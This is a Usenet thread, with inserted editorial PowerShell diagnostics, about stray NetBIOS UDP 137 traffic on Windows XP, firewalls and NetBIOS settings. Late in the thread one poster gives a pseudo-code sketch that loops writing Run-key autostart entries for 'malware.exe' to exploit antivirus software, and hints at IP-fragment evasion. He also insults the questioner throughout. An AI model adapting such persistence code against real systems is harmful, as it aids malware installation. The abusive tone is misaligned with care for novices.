How to block UDP port 137 traffic

UDP traffic is not as critical as TCP traffic. Nevertheless, I seem unable to block some outgoing UDP port 137 traffic (netbios-ns) from my system. My PSF shows a listening state, but no remote address (the executable is indicated as "system"). In my PSF I have a top rule denying any traffic on my port 137 to and from any remote port and address with any application. While this rule stops all the traffic where there is a visible remote address, it does not stop outgoing "system" traffic to unknown addresses.

Which automatic or enabled service may be responsible for that, if at all? Any other hints?

(Windows XP Pro SP2, stand-alone, cable connection, Windows file sharing disabled)

Andy

Reply to
Andy prelignat

Interesting thesis.

So there is the system listening on a port. Why do you think listening is related to talking? E.g., why should there be any traffic if there is just a process listening?

Cheers, Jens

Reply to
Jens Hoffmann

"Jens Hoffmann" schrieb im Newsbeitrag news: snipped-for-privacy@mid.uni-berlin.de...

That's what I gathered from various sites while googling. But you seem to disagree. As a relative greenhorn I would welcome more details.

Because there are udp bytes sent. I wonder then where to?

Andy

Reply to
Andy prelignat

Hi,

Andy prelignat wrote:

There is no difference in threat between UDP or TCP. If there is an increased danger, then it is if you run something you do not understand.

There are no packets sent without target address. So check them. Have a look at Wireshark, for example.

Forget about PFWs; they are the first thing malware is going to attack.

Cheers, Jens

Reply to
Jens Hoffmann
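Jens's advice is to look at the actual datagrams rather than the firewall's summary. The following PowerShell is an added example, not code from the thread. It assumes a Windows box with netstat.exe on the PATH and Wireshark's tshark.exe installed; the interface index "-i 1" is an assumption (run "tshark -D" to list yours). Two facts it relies on: on XP the owner of the UDP 137 socket is PID 4 ("System") because NetBT (netbt.sys) is a kernel-mode driver, and NBNS name registrations and queries in the default B-node configuration are sent to the subnet broadcast address, so a firewall that only lists unicast peers shows no "remote address" for them.

```powershell
# Added example, not part of the thread. Assumes Windows with netstat.exe on
# PATH and Wireshark's tshark.exe installed; "-i 1" is an assumed interface
# index, run "tshark -D" to list yours.

# 1. Which process owns UDP 137? netstat -ano prints the owning PID. On XP
#    this is PID 4 ("System") because NetBT (netbt.sys) runs in kernel mode.
function Get-Udp137Owner {
    netstat -ano -p udp | ForEach-Object {
        if ($_ -match '^\s*UDP\s+(\S+):137\s+\*:\*\s+(\d+)\s*$') {
            $ownerPid = [int]$Matches[2]
            [pscustomobject]@{
                LocalAddress = $Matches[1]
                PID          = $ownerPid
                Process      = (Get-Process -Id $ownerPid -ErrorAction SilentlyContinue).ProcessName
            }
        }
    }
}
Get-Udp137Owner | Format-Table -AutoSize

# 2. Where do the datagrams go? NBNS name registrations and queries are sent
#    to the subnet broadcast address (e.g. 192.168.1.255) in the default
#    B-node configuration, so there is no single remote host to show.
#    Capture 20 packets and print source, destination and the NetBIOS name.
tshark -i 1 -f "udp port 137" -c 20 -T fields -e ip.src -e ip.dst -e nbns.name
```

If the capture shows destinations ending in .255 (or 255.255.255.255), the "unknown address" in the PSF is simply the broadcast address, and the sender is the NetBT driver itself, not an application the firewall could block by executable.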

Are you on a router? If so, you will see traffic between your system and router on ports 137-139. Your firewall rule probably prohibits outgoing traffic to the Internet, but there will still be local communication with the router on those ports. If you're not using a router, then go into Control Panel > Network and Internet Connections > Network Connections, right-click your connection, click Properties > Networking, select Internet Protocol (TCP/IP) and click Properties > Advanced > WINS (tab), then make sure "Disable NetBIOS over TCP/IP" is checked.

Reply to
Bullseye
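The same change Bullseye describes through the WINS tab, scripted and verified. This is an added example, not from the thread: Win32_NetworkAdapterConfiguration and its SetTcpipNetbios method are real WMI APIs (the GUI's "Disable NetBIOS over TCP/IP" corresponds to TcpipNetbiosOptions = 2), while the adapter selection and the two checks afterwards are this example's own choices. Disabling NetBT stops the machine from registering, resolving or being reached by NetBIOS name on UDP 137/138 and TCP 139; SMB over TCP 445 is unaffected, which is fine for a stand-alone workstation with file sharing already off.

```powershell
# Added example, not part of the thread. Run in an elevated PowerShell.
# Win32_NetworkAdapterConfiguration and SetTcpipNetbios are real WMI APIs; the
# adapter selection and the two checks afterwards are this example's choice.
# TcpipNetbiosOptions: 0 = take the setting from DHCP (default), 1 = enabled,
# 2 = disabled ("Disable NetBIOS over TCP/IP" in the WINS tab).

# Before: current setting per IP-enabled adapter.
Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled = True" |
    Select-Object Description, IPAddress, TcpipNetbiosOptions |
    Format-Table -AutoSize

# Change: disable NetBIOS over TCP/IP on every IP-enabled adapter.
# ReturnValue 0 = done, 1 = done but a reboot is required.
Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled = True" |
    ForEach-Object {
        $result = $_.SetTcpipNetbios(2)
        '{0}: ReturnValue={1}' -f $_.Description, $result.ReturnValue
    }
# (On XP without PowerShell the same call is:
#  wmic nicconfig where IPEnabled=True call SetTcpipNetbios 2)

# Check 1: the per-interface registry value NetbiosOptions must now be 2.
$ifKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
Get-ChildItem $ifKey | ForEach-Object {
    '{0}: NetbiosOptions={1}' -f $_.PSChildName, (Get-ItemProperty $_.PSPath).NetbiosOptions
}

# Check 2: nothing should be bound to UDP 137/138 or TCP 139 any more
# (if a line still shows up, reboot and check again).
netstat -ano | Select-String ':13[789]\s'
```

Setting the value through WMI rather than the GUI makes the change auditable: the registry check tells you per interface whether it stuck, and the netstat check confirms the listener is gone, which is the only state in which the PSF rule on port 137 has nothing left to do.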

Reply to
Andy prelignat

Unfortunately the real problem still isn't solved yet: gross incompetence. Because I don't think that the *official documentation* leaves any doubt on this point:

Reply to
Sebastian G.

The world is lucky to have only a few people like you who offer only sarcasm instead of help. Jim

Reply to
Jimbo

Let me get this straight:

- This guy has no f****ng clue about his system, Windows, networking and TCP/IP, yet he wants to run a firewall and even achieve a decent level of security by doing so.

- He didn't even bother to read the f****ng^W fine manual, where Microsoft explicitly enumerates all relevant options regarding network communication.

- Neither did he even try checking the most obvious option. Heck, if you have activated NetBIOS TCP/IP transports, you really shouldn't wonder about TCP/UDP traffic on ports 137-139. *It's supposed to work like that!*

How exactly do you think this will end? His firewall (that is none) will not provide any security, will f*ck up his network and most likely pose an additional attack vector. His system will submit other information using other protocols than NetBT, because he didn't even bother to configure it. He'll keep on babbling nonsense about network protocols he doesn't understand, he'll ask further for even more misunderstood non-problems and achieve absolutely nothing in the end.

Sorry for me trying to point out to him that he's a clueless wannabe who should rather pay competent people for administrating his computer, like we're paying repair men to repair our cars, paying plumbers to fix our toilet and paying dumbsters to carry away our garbage.

Reply to
Sebastian G.

Why did you not point this out in a civil manner. That would have been HELP. Jim

Reply to
Jimbo

Don't worry, this is the ugly German's way of "helping". That is also the reason why I do not write in German newsgroups.

"Jimbo" must be a real crack. I have neither the time nor do I feel like becoming one. I'm happy when my windows system and my antivirus software is up-to-date, and since my softwarefirewall shows my TCP ports being stealth in all free online test, such as GRC, Security Space, PC-Flank, HackerWatch and others I think I achieve a "decent" level of security. And I am well aware that there is no such thing as 100% security. I run neither a bank nor any other company, nor do I run a server, and I do observe the usual security measures when surfing and mailing. Why in gods sake should I be a target for an attack? That my new system was sending during a few days some UDP (not TCP) bytes on port 137 did not shock me, nor that possibly other protocols than netbios may send bytes to the world. Others may be paranoid, not me.

Andy

Reply to
Andy prelignat

Reply to
RedForeman

Just run in a NAT environment; the nature of NAT will cause the packets to have trouble reaching your computer.

Reply to
Hexalon

"trouble" as in "troublesome, but can be easily circumvented and even fails spontanously"? D'oh, even the RFC about NAT explicitly states that NAT is not intended or suitable as a security mechanism.

Reply to
Sebastian G.

So? Which one is your antivirus software? I'd be happy to present you with multiple security vulnerabilities that aren't even patched in the latest and most up-to-date version. Better not mention the security vulnerability in Windows that I recently reported...

you have a serious network problem.

you can't even be sure that your configuration works as expected, since you never bothered to run any test that is not totally f***ed up.

Must be interesting others, because based upon what you presented, there's no indication of any security.

Ah, the common argument to justify the common ignorance about the actual important criteria like reliability and accountability of security measures, yes, the ones you're lacking.

- because computer programs are not intelligent enough to differ between interesting and non-interesting target, that's why they simply target all

- because your system is a very easy target, with your "software firewall" you're actually opening it up for various remote exploits

- because you can offer disk space and bandwidth

Didn't? Ouch!

Reply to
Sebastian G.

That may be correct. Right now I'm using the latest version of Norman. If you know of any known and yet unpatched holes (apart from the latest viruses), please let the community know. Indicate the ng if you post it elsewhere.

... and have not yet been patched by M$. Interesting. Please expand on that. (My OS: Windows XP Pro SP2 with IE 7, stand-alone)

Ahm, please be a bit more specific.

All these tests are totally f***ed up? Can I read somewhere online some details about this rather tough qualification? But you will surely recommend to me and the world some non-f***ed-up ones which are freely available online.

Others include HackerWacker, webscan.security-check.ch, seccheck.onsite.ch, it-sec.de, as well as a number of specialized tests. But that means that I share this zero security with approx. 95% or more of private Windows users. If there's "no indication of any security" on my system, I wonder how you would qualify those approx. 80% of private Windows users who have all doors wide open, unsecured WLANs, IE on the lowest security levels for all sites, etc., etc.?

That is certainly true.

Not that easy! Because I'm quite sure that I have it configured as well as it can possibly be done.

So you think that my system could be a bot and used for spamming the world? Highly unlikely. The symptoms for that would be all too obvious. BTW, the UDP bytes that my system sent on port 137 for a few days were regularly below 100 bytes.

You will certainly be able to contradict me in any of the above replies. Please do so. But be aware that you will not be able to turn me into becoming paranoid.

Cheers, Andy

Reply to
Andy prelignat

```c
/* Sketch as posted: two threads each spin writing an autostart value, one
   under HKLM and one under HKCU. The thread and registry calls are pseudo-API
   names (not real pthread or Win32 functions), so this is not compilable
   as-is; the unterminated string and the mismatched variable name of the
   original post are fixed. */
pthread t1, t2, p;

create_new_thread(&t1);
create_new_thread(&t2);

p = getCurrentThread();
if (p == t1) {
    while (TRUE)
        RegWriteKeyEx(HKEY_LOCAL_MACHINE,
                      L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                      L"pwn3d", REG_SZ, NULL, L"malware.exe");
}
if (p == t2) {
    while (TRUE)
        RegWriteKeyEx(HKEY_CURRENT_USER,
                      L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                      L"pwn3d", REG_SZ, NULL, L"malware.exe");
}
```

Don't worry, McAfee, Symantec and CA all have the same problem of validating volatile data directly in user-mode memory.

Don't worry, it's just a way how a non-privileged user can crash the entire system with a bluescreen. More details after the patch is released.

But, you know, I would have easily fixed it myself. Strange enough I can't find the source code in the Windows CDROM...

- not RFC conformant

- fucks up various network protocols

- fucks up load balancing

- creates tons of repeated traffic

You know, "stealth" is commonly considered as defective for a reason.

formatting link
and ff., just for a start. They all fail even simplest consistency checks.

formatting link

No mention of employing least privilege principle? No mention of secure configuration, which also includes shutting down unnecessary services?

Indeed.

Not any different. BTW, where's the difference on IE security settings? You could configure it maximally secure and still it could be trivially exploited.

Doesn't matter. It simply *is* the target. And even if not, it can be trivially circumvented (anyone dare to comment on overlapping IP fragments?).

Obvious to you? Doubtful.

So what? My malware would never even show up in these statistics. Neither would about any serious malware from the last ten years.

I'm not trying to. I'd just like to point out that you're much more clueless than you think, and that deploying non-understood and misunderstood (pseudo) security solutions won't help anything at all.

Reply to
Sebastian G.

[script deleted] What did you want to prove with this script?

Well, Norman is one of the few with a sandbox technology that seems to belong to the best, viz.

formatting link

Ok, lets see what MS comes up with.

Suppose you are talking of Windows XP in general and not of my situation in particular. If not, what makes you think like that?

Sorry, I don't understand that

I know this site. I do however not know of any similar site for e.g.

formatting link
or other scans mentioned.

Thanks, will try it out as well as some of the other scans recommended on this site. And report back.

Well, these were simply a few examples and not meant to be exhaustive. BTW, I only use admin rights when needed, and all unnecessary services for my stand-alone workstation are disabled based on info from

formatting link

That is slightly exaggerated, to be on the very safe side.

Nothing is impossible was Toyota's claim in TV advertising. But you really seem to be a bit paranoid; according to you the average user should stay away from the internet and go back to the good old library and snail mail. Therefore, I recommend the following for you:

formatting link

Yes my friend, obvious for me.

That may well be true for all people. Socrates (or was it Plato?) already said that all he knew was that he knew nothing. ;-)

Andy

Reply to
Andy prelignat

A privilege escalation vulnerability introduced by the "security" software itself, and gross incompetence of the vendor.

formatting link

What a nonsense.

No, your situation.

Your "stealth" nonsense is responsible for these defects.

What a nonsense. My claim is that such pseudo security software just makes things worse, especially for not so tech-savvy people.

The point is about knowing your limits and acting accordingly.

Reply to
Sebastian G.
